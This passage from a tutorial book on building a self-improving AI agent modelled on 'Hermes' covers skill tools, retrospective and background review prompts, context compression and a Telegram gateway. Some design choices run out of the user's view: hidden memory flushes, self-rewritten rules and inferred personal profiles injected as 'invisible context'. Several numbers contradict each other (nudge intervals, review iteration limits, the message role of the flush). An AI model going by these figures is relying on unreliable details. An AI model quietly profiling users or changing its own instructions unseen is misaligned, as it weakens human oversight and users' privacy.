    skill_dir = find_skill(name)
    if file_path:
        # Tier 3: load a specific reference/template file
        return (skill_dir / file_path).read_text()
    # Tier 2: load the main SKILL.md
    return (skill_dir / "SKILL.md").read_text()

def skill_manage(action, name, content=None, category=None,
                  file_path=None, file_content=None) -> str:
    """Create, edit, patch, or delete skills."""
    if action == "create":
        # Creates skill_dir/SKILL.md with validated frontmatter
        skill_dir = skills_dir / (category or "") / name
        skill_dir.mkdir(parents=True)
        (skill_dir / "SKILL.md").write_text(content)
    elif action == "patch":
        # Find-and-replace within SKILL.md or a supporting file
        # Uses exact string matching -- precise, token-efficient
        ...
    elif action == "edit":
        # Full rewrite of SKILL.md
        ...
    elif action == "write_file":
        # Add/overwrite a supporting file (references/, templates/, etc.)
        ...
    elif action == "delete":
        # Remove entire skill directory
        ...
Security Hermes runs a security scan (skills_guard.py) on every agent-created skill. It checks for shell injection, credential exposure, and path traversal. The skill_manage tool validates that file paths stay within ALLOWED_SUBDIRS (references, templates, scripts, assets) and rejects path traversal attempts.
Minimal version vs. real Hermes
This book Three functions: skills_list, skill_view, skill_manage. Basic YAML frontmatter parsing. Folder discovery via rglob("SKILL.md").
Hermes v0.8 Platform filtering (platforms: [macos]). Environment variable prerequisites with interactive secret collection. Atomic writes via tempfile + os.replace(). Security scanning on create. External skill directories. Skills Hub integration for community skills. 100K character size limit per SKILL.md.
Source: tools/skills_tool.py (skills_list, skill_view), tools/skill_manager_tool.py (skill_manage), agent/skill_utils.py

11 Autonomous Skill Creation

After finishing a complex task, the agent asks itself: "Would this solution be useful again?" If yes, it writes a Skill.

This is the mechanism that turns one-time problem solving into reusable knowledge. The agent does not silently create a Skill for every task. Per the skill_manage tool description, the agent offers to save as a skill and confirms with the user before creating or deleting. The background nudge system (Chapter 13) can also trigger skill review, but the confirmation flow is the designed behavior for interactive sessions.

When to create a Skill

The real Hermes triggers Skill creation when a task had:

The retrospective prompt

Skill creation is driven by a prompt, not by code heuristics. After the task completes, the agent receives a retrospective prompt that asks it to evaluate its own work:

class Retrospective:
    PROMPT = """Review the conversation that just finished.

1. MEMORY: Are there facts worth remembering long-term?
   - User preferences discovered
   - Project context learned
   - Solutions that worked (or didn't)
   If yes, call the memory tool to save each observation.

2. SKILL CREATION: Was this task complex enough to warrant a reusable Skill?
   Criteria: 5+ tool calls, error recovery, non-obvious workflow.
   If yes, call skill_manage with action="create" and:
   - A descriptive name
   - Trigger conditions (when should this Skill activate)
   - Step-by-step procedure
   - Constraints and gotchas discovered

3. SKILL UPDATE: Was an existing Skill used? Did it work well?
   If not, call skill_manage with action="patch" (old_string/new_string).

Be selective. Not every task deserves a Skill. Not every fact deserves
to be remembered. Only save what will genuinely help in the future."""

    def run(self, agent, conversation_messages):
        """Run retrospective analysis on the completed conversation."""
        # Build a summary of what just happened
        summary = self._summarize_conversation(conversation_messages)

        # Ask the agent to evaluate
        agent.run(
            f"[RETROSPECTIVE]\n\n"
            f"Conversation summary:\n{summary}\n\n"
            f"{self.PROMPT}"
        )
The key insight Skill creation is not a separate code path with if/else logic. It is the same agent loop, given a different prompt. The LLM's judgment determines what is worth saving. This is what makes the system flexible: you do not need to anticipate every scenario in code. You write a prompt that teaches the agent how to think about what is worth keeping.

How the agent creates a skill

The agent calls skill_manage with action="create". It provides the full SKILL.md content including frontmatter:

# The agent generates this tool call:
skill_manage(
    action="create",
    name="csv-to-database",
    category="data",  # optional subfolder
    content="""---
name: csv-to-database
description: Clean CSV data and import into a database
version: "1.0.0"
---

# CSV to Database Import

## Trigger
Activate when the user asks to import CSV, clean data, or load
data into a database.

## Steps
1. Read the CSV and detect column types
2. Clean: strip whitespace, handle nulls, validate dates
3. Create table with appropriate column types
4. Bulk insert with error logging

## User Preferences
- Connection method: psycopg2 (user prefers this over SQLAlchemy)
- Always check if table exists first
"""
)

This creates ~/.hermes/skills/data/csv-to-database/SKILL.md. The skill is immediately available for the next conversation.

Source: tools/skill_manager_tool.py (skill_manage function, actions: create/edit/patch/delete/write_file/remove_file)

12 Skill Self-Improvement

Creating a Skill is step one. Updating it based on real-world feedback is what makes it "self-improving."

Traditional Skills are static: you write them, and they stay the same until someone manually edits them. Hermes Skills are alive. Every time a Skill is used and the user provides feedback, the agent can update the Skill file to incorporate what it learned.

The improvement cycle

1. Execute Follow the Skill 2. Feedback User corrects 3. Patch Update Skill file 4. Next Use Improved version cycle repeats with each use

The patch action

Hermes prefers patching over rewriting. The skill_manage tool's patch action does exact string find-and-replace within a SKILL.md or supporting file. This is important for two reasons: it preserves parts that work, and it uses far fewer tokens than a full rewrite.

# The agent generates this tool call:
skill_manage(
    action="patch",
    name="github-daily-digest",
    old_string="3. Group by type (PR / Issue)",
    new_string="3. Group by type (PR / Issue / Discussion)",
)
# Exact find-and-replace within SKILL.md.
# old_string must be unique unless replace_all=True.
# Include enough surrounding context to ensure uniqueness.
# Use file_path="references/api.md" to patch a supporting file.
# Use action="edit" for full rewrites when patches are too numerous.

A concrete example of how this works in practice:

  1. You ask Hermes to sort through GitHub notifications. It follows its "GitHub Daily Digest" Skill, returning only PRs and Issues.
  2. You say: "Include Discussions too." Hermes adds Discussions to this response.
  3. Hermes recognizes this is a correction to the Skill. It calls skill_manage(action="patch", old_string="...", new_string="...") to update the Skill's steps.
  4. Next time you say "check GitHub," the Skill already includes Discussions. You never have to mention it again.
Intuition This is the automation of Mitchell Hashimoto's "add a rule to CLAUDE.md every time the AI makes a mistake" approach. The difference is that the agent adds the rule itself, without human effort. The trade-off is less precision (the agent might misunderstand the feedback) in exchange for zero maintenance burden.
Part V

Putting It All Together

13 The Learning Loop: Nudges, Background Review, and Compression Flush

The Learning Loop is not a single post-task retrospective. It is three distinct trigger mechanisms that fire at different times, all running in the background.

None of the components we have built are individually novel. Memory, skills, retrieval, user profiling: the AI field has seen all of these before. What Hermes does differently is wire them into a causal chain where each component feeds the next. But the "how" matters as much as the "what."

The book's earlier chapters presented a simplified model of a single retrospective that fires after each task. The real Hermes is more nuanced. Learning is triggered by three independent mechanisms:

TriggerWhen it firesWhat it does
Memory nudgeEvery N user turns (default: 10)Background review of conversation for facts worth persisting
Skill nudgeEvery N tool-calling iterations (default: 10)Background review for reusable procedures to create or update
Compression flushWhen context window hits 50% capacityExtract memories before old messages are summarized and discarded

Nudge counters

Hermes maintains two counters that tick up during normal operation:

class Agent:
    def __init__(self):
        # Nudge configuration (from config.yaml)
        self._memory_nudge_interval = 5    # turns between memory reviews
        self._skill_nudge_interval = 8    # tool iterations between skill reviews
        self._turns_since_memory = 0
        self._iters_since_skill = 0

    def run_turn(self, user_input):
        # Before the agent loop: check memory nudge
        self._turns_since_memory += 1
        should_review_memory = (
            self._turns_since_memory >= self._memory_nudge_interval
        )
        if should_review_memory:
            self._turns_since_memory = 0

        # Run normal agent loop...
        response = self._agent_loop(user_input)

        # After the agent loop: check skill nudge
        should_review_skills = (
            self._iters_since_skill >= self._skill_nudge_interval
        )
        if should_review_skills:
            self._iters_since_skill = 0

        # Counters reset when the agent actually uses the tool
        # (not just when the nudge fires)

        # Spawn background review if either trigger fired
        if should_review_memory or should_review_skills:
            self._spawn_background_review(
                review_memory=should_review_memory,
                review_skills=should_review_skills,
            )

        return response

The counters also reset when the agent voluntarily uses the memory or skill_manage tool during normal conversation. If the agent is already saving memories on its own, the nudge does not need to fire.

Background review: a forked agent on a separate thread

When a nudge fires, Hermes does not inject a "please review your work" message into the user-facing conversation. Instead, it forks a new agent instance on a background thread with a snapshot of the conversation:

def _spawn_background_review(self, review_memory, review_skills):
    import threading

    # Pick the right prompt
    if review_memory and review_skills:
        prompt = COMBINED_REVIEW_PROMPT
    elif review_memory:
        prompt = MEMORY_REVIEW_PROMPT
    else:
        prompt = SKILL_REVIEW_PROMPT

    messages_snapshot = list(self.messages)

    def _run():
        # Create a new agent with same model and tools
        review_agent = Agent(model=self.model, max_iterations=6)
        # Share the memory/skill stores (thread-safe writes)
        review_agent.memory_store = self.memory_store
        # Disable nudges on the review agent (no infinite recursion)
        review_agent._memory_nudge_interval = 0
        review_agent._skill_nudge_interval = 0
        # Run with the conversation snapshot + review prompt
        review_agent.run(messages_snapshot, prompt)

    threading.Thread(target=_run, daemon=True).start()

This is a critical design choice: the review never competes with the user's task for model attention. The user sees their response immediately. The learning happens silently in the background.

Compression flush: the third trigger

When the context window hits 50% capacity, compression kicks in. But before old messages are summarized and discarded, Hermes gives the agent one final chance to save anything important:

def compress_context(self, messages):
    # Step 1: Memory flush -- let the model save memories before they're lost
    self.flush_memories(messages, min_turns=0)

    # Step 2: Notify external memory providers
    if self.memory_manager:
        self.memory_manager.on_pre_compress(messages)

    # Step 3: Now compress (summarize middle, keep head + tail)
    compressed = self.compressor.compress(messages)

flush_memories() appends a user-role sentinel containing [System: The session is being compressed. Save anything worth remembering...]. It is a user message, not a system message, so it fits naturally into the conversation flow. The agent gets one API call with the memory tool available. After any saves, all flush artifacts (the sentinel and any tool calls) are stripped from the message list. The user never sees this exchange.

The on_pre_compress() hook notifies external memory providers (like Honcho) so they can also extract insights from the about-to-be-discarded messages.

The Flywheel feeds raw material triggers enables precise recall personalizes targets next Memory Curation Skill Creation Skill Improvement FTS5 Recall User Profiling positive feedback loop

Here is how the chain works:

  1. Memory curation feeds Skill creation. The observations stored in memory provide the raw material. The agent notices "I've done this CSV import three times now" because it can search past sessions.
  2. Skill usage generates new memories. Every time a Skill runs, the results (success, failure, user corrections) get recorded in session memory, triggering potential Skill improvements.
  3. Improved Skills produce better results. Better results mean the user is satisfied more often, which means fewer corrections, which means the agent's user model becomes more accurate.
  4. Better user modeling makes memory curation more targeted. The agent knows what this specific user cares about, so it saves observations that are genuinely relevant.
  5. More targeted memories feed better Skill creation. And the loop continues.

This is a positive feedback loop. The more you use it, the stronger every step gets. Use it for three to five days, and you will notice a clear difference.

The review prompts

The background review agent receives one of three prompts depending on which triggers fired:

Memory review prompt (actual) "Review the conversation above and consider saving to memory if appropriate. Focus on: Has the user revealed things about themselves -- their persona, desires, preferences, or personal details worth remembering? Has the user expressed expectations about how you should behave? If something stands out, save it using the memory tool. If nothing is worth saving, just say 'Nothing to save.' and stop."
Skill review prompt (actual) "Review the conversation above and consider saving or updating a skill if appropriate. Focus on: was a non-trivial approach used to complete a task that required trial and error, or changing course due to experiential findings? If a relevant skill already exists, update it with what you learned. Otherwise, create a new skill if the approach is reusable."

When both triggers fire simultaneously, a combined prompt covers both. The review agent has a low iteration budget (max 8) to prevent runaway costs.

Minimal version vs. real Hermes
This book Two nudge counters + compression flush. Background thread with forked agent. Configurable intervals.
Hermes v0.8 Same architecture, plus: nudge counters persist across run_conversation() calls in CLI mode. External memory providers get on_session_end(), on_pre_compress(), and on_delegation() hooks. Review agent stdout/stderr redirected to /dev/null. Memory flush injects a system message, executes one API call, then strips all artifacts.
Source: run_agent.py lines 2034-2115 (_spawn_background_review), lines 6390-6420 (flush_memories), lines 7629-7638 (nudge logic), lines 10218-10246 (post-turn trigger)

14 Context Compression

Long conversations blow up the context window. Compression keeps the agent running without hitting token limits.

LLMs have a fixed context window (128K tokens for many current models, but costs scale linearly). A long coding session can easily hit 50K+ tokens. Without compression, the agent either crashes or becomes very expensive.

Hermes implements a middle-out compression strategy:

  1. Protect the head. The first 3 messages (system prompt + initial user message + first assistant response) are never compressed. They contain the identity and task context.
  2. Protect the tail. The most recent ~20K tokens are kept intact. This is the active working context.
  3. Compress the middle. Everything between head and tail is summarized by a cheap, fast LLM into a structured summary.
class ContextCompressor:
    THRESHOLD = 0.5  # Trigger at 50% of context window
    TAIL_TOKENS = 20000
    HEAD_MESSAGES = 3

    def maybe_compress(self, messages, max_tokens):
        estimated = self._estimate_tokens(messages)
        if estimated < max_tokens * self.THRESHOLD:
            return messages  # No compression needed

        head = messages[:self.HEAD_MESSAGES]
        tail = self._get_tail(messages, self.TAIL_TOKENS)
        middle = messages[self.HEAD_MESSAGES:-len(tail)]

        if not middle:
            return messages

        # Summarize the middle section
        summary = self._summarize_middle(middle)

        return head + [{
            "role": "system",
            "content": f"[Compressed context summary]\n{summary}"
        }] + tail

    def _summarize_middle(self, messages) -> str:
        transcript = "\n".join(
            f"{m['role']}: {m.get('content', '[tool call]')[:200]}"
            for m in messages
        )
        resp = self.aux_client.chat.completions.create(
            model=self.aux_model,
            messages=[{
                "role": "system",
                "content": "Summarize this conversation segment. Include:\n"
                    "- Questions that were resolved\n"
                    "- Decisions that were made\n"
                    "- Pending work items\n"
                    "- Key facts discovered\n"
                    "Be concise. Under 500 words."
            }, {
                "role": "user",
                "content": transcript
            }],
            max_tokens=800,
        )
        return resp.choices[0].message.content

Before compression happens, two things fire (as described in Chapter 13): flush_memories() gives the agent one API call to save important observations, and on_pre_compress() notifies external memory providers. This way, facts are not lost to summarization.

Minimal version vs. real Hermes
This book Threshold-based trigger. Protect head (3 messages) + tail (~20K tokens). Summarize middle via cheap LLM.
Hermes v0.8 Same core strategy, plus: flush_memories() before compression (one extra API call to save facts). on_pre_compress() hook for external memory providers. Iterative re-compression: if the summary from a previous compression is in the middle, it gets re-summarized. Structured summary template (Resolved/Pending/Remaining Work). System prompt invalidation + memory reload after compression.
Source: agent/context_compressor.py, run_agent.py lines 6564-6579 (compression trigger with memory flush)

15 Building the CLI and Gateway

The interface. Where the user meets the agent.

The CLI

The minimal CLI is a read-eval-print loop that initializes the agent and feeds it user input:

import yaml
from openai import OpenAI
from pathlib import Path

def main():
    # Load config
    config_path = Path.home() / ".mini-hermes" / "config.yaml"
    config = yaml.safe_load(config_path.read_text())

    # Initialize components
    client = OpenAI(
        api_key=config["model"]["api_key"],
        base_url=config["model"].get("base_url"),
    )
    data_dir = Path.home() / ".mini-hermes"

    session_db = SessionDB(data_dir / "state.db")
    persistent = PersistentMemory(data_dir)
    skill_loader = SkillLoader(data_dir / "skills")

    # Build system prompt ONCE (frozen snapshot for the session)
    builder = PromptBuilder()
    system_prompt = builder.build(
        memory_block=persistent.load(),  # frozen at session start
        skills_index=skill_loader.build_skills_index(),
        user_context="",
    )

    # Create session
    session_id = session_db.create_session()

    # Create agent with frozen system prompt
    agent = HermesAgent(
        client=client,
        model=config["model"]["model"],
        system_prompt=system_prompt,  # not rebuilt per turn
        tools=registry.get_schemas(),
        tool_handlers={t.name: t.handler for t in registry._tools.values()},
    )
    agent.session_db = session_db
    agent.session_id = session_id

    # REPL
    print("Mini-Hermes ready. Type 'exit' to quit.\n")
    while True:
        user_input = input("you > ").strip()
        if user_input.lower() in ("exit", "quit"):
            break
        if not user_input:
            continue

        response = agent.run_with_learning(user_input)
        print(f"\nhermes > {response}\n")

if __name__ == "__main__":
    main()

Extending to Telegram

Hermes supports 14 platforms through a single Messaging Gateway: one process that listens to all configured platforms simultaneously. The key design decision is that all platforms share the same memory database, the same skills directory, and the same session store.

However, the gateway does not keep a single agent instance alive. It creates a fresh agent object per message, loading the stored system prompt from the session DB so the Anthropic prefix cache still hits. This is an important distinction: session continuity comes from the database, not from a long-lived object in memory.

from telegram.ext import Application, MessageHandler, filters

async def handle_message(update, context):
    user_text = update.message.text

    # Create a fresh agent per message (like real Hermes gateway)
    # The session DB provides continuity, not a long-lived object
    session_id = get_or_create_session(update.effective_user.id)
    agent = HermesAgent(
        client=client,
        model=config["model"]["model"],
        system_prompt=load_system_prompt_from_session(session_id),
        tools=registry.get_schemas(),
        tool_handlers={t.name: t.handler for t in registry._tools.values()},
    )
    agent.session_db = session_db
    agent.session_id = session_id

    response = agent.run_with_learning(user_text)
    await update.message.reply_text(response)

app = Application.builder().token(config["gateway"]["telegram"]["token"]).build()
app.add_handler(MessageHandler(filters.TEXT, handle_message))
app.run_polling()

Deploy this on a $5 VPS and you have a 24/7 AI assistant reachable from your phone, with persistent memory across every conversation.

Minimal version vs. real Hermes
This book Fresh agent per message. System prompt loaded from session DB. Single-user Telegram bot.
Hermes v0.8 Gateway process (hermes gateway) with platform adapters for 14 services. Session routing tied to user IDs, not platforms. Cron ticking for scheduled tasks. Cross-platform conversation continuity. Fresh AIAgent per message with stored system prompt from session DB for cache consistency.
Source: gateway/run.py, run_agent.py lines 7650-7677 (system prompt caching on continuation)

16 What You Built and Where to Go Next

A review of the complete system, and pointers to everything we left out.

What you have

By following this guide, you have built a minimal but complete self-improving AI agent. Here is the component map:

ComponentWhat it doesHermes equivalent
Agent LoopMessage -> tools -> response cyclerun_agent.py
Tool RegistryRegister, schema, dispatch toolstools/registry.py
Prompt BuilderAssemble identity + memory + skillsagent/prompt_builder.py
Prompt Cachingsystem_and_3 cache breakpointsagent/prompt_caching.py
Session DBSQLite + FTS5 conversation storagehermes_state.py
Persistent MemoryMEMORY.md / USER.mdBuilt-in memory provider
Session RecallFTS5 search + LLM summarizationtools/session_search_tool.py
Skill Toolsskills_list / skill_view / skill_managetools/skills_tool.py, tools/skill_manager_tool.py
Learning LoopNudge counters + background review + compression flushrun_agent.py (_spawn_background_review)
CompressionMiddle-out context window managementagent/context_compressor.py
CLITerminal interfacecli.py

What we left out

The real Hermes has substantially more. Here is what to explore next, in order of impact:

Sub-agent delegation

Hermes can spawn up to 3 concurrent sub-agents, each with its own context and restricted toolset. Useful for parallel research (one agent per topic) or separating concerns (one codes, one tests, one reviews). The key insight: sub-agents get restricted tool access for both efficiency and security.

MCP integration

Model Context Protocol lets the agent connect to 6,000+ external applications (GitHub, Slack, Jira, databases) via a standard protocol. Each MCP server is a separate process, communicating over stdio or HTTP.

Honcho user modeling

An optional external integration that goes beyond what you said to infer what kind of person you are. It tracks 12 identity layers including technical level, work rhythm, communication style, and preference contradictions. The inferences are injected as invisible context.

Cron scheduling

Natural-language scheduled tasks. "Check my GitHub notifications every morning at 9am" creates a timed trigger. Results are delivered through the Messaging Gateway.

Multi-model orchestration

The moa tool calls multiple LLMs simultaneously and synthesizes their responses. Useful for high-stakes decisions where you want diverse perspectives.

Reinforcement learning

Hermes has experimental RL support for fine-tuning the agent's decision-making. This is a research frontier, not yet stable.


The ceiling of self-improvement

Self-improvement makes the agent run faster in a known direction. But the direction itself still needs a human to set. The agent can optimize its git commit format, but it cannot judge whether the architecture of your system is sound. It can learn your preferences, but it can learn wrong ones too.

The Learning Loop relies on feedback quality. When you provide clear corrections ("add Discussions to the GitHub digest"), the system works beautifully. When you say nothing, the agent evaluates itself using its own criteria. "Faster" does not always mean "correct."

As you extend your minimal agent, remember: the mechanisms work. The harder problem is pointing them in the right direction.

Final thought The tools in this guide are not theoretical. Every component maps to real, running code. What you have built is a skeleton key to understanding agent architectures like Hermes. Read it. Modify it. Make it your own. The most powerful AI tools are the ones you understand end to end.